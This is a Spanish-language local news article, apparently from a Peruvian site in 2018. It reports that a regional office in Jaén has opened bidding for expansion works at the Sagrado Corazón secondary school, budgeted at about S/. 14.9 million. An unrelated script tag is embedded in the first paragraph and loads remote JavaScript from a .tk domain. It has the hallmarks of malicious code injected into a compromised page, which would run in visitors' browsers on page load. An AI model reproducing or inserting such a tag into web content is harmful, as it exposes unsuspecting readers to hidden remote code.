Ingresar

Gerencia Sub Regional lanzó a convocatoria obra de Colegio Sagrado Corazón en Jaén

Domingo, 11 Marzo, 2018 - 19:16
Como se había anunciado, el último viernes, la Gerencia Sub Regional Jaén – San Ignacio, cumplió con efectuar la convocatoria a través del Sistema Electrónico de Contrataciones del Estado – SEACE, el último viernes 9 de marzo. <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Como se había anunciado, el último viernes, la Gerencia Sub Regional Jaén – San Ignacio, cumplió con efectuar la convocatoria a través del Sistema Electrónico de Contrataciones del Estado – SEACE, el último viernes 9 de marzo.

La Adjudicación Simplificada N°01-2018-GR.CAJ-GSRJ-1, derivado de la Licitación Pública N°06-2017, para contratación de ejecución de la obra: Mejoramiento y Ampliación del Servicio Educativo de la Institución Educativa Secundaria “Sagrado Corazón” de la ciudad de Jaén, distrito de Jaén, provincia de Jaén - Cajamarca.

Como se había informado anteriormente, tras obtener el 100 % del presupuesto de financiamiento, la Gerencia Sub Regional Jaén – San Ignacio, lanzaría la convocatoria a licitación de dicha obra, la misma que ya había sido sometida a licitación en 2016, pero ese proceso fue declarado desierto, por lo cual entro a una etapa de actualización, que significaron cambios como por ejemplo el presupuesto.

Ahora tras varias gestiones desde la Gerencia Sub Regional, encabezada por el Ing. Cleyver Aguilar, se ha logrado sea incorporado un presupuesto, por lo que el monto ahora asciende a S/. 14,949,127 soles.

Si todo avanza de manera positiva, en las próximas semanas se conocerá el nombre de la empresa ganadora, que tras participar en la licitación pueda adjudicarse la buena pro.

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen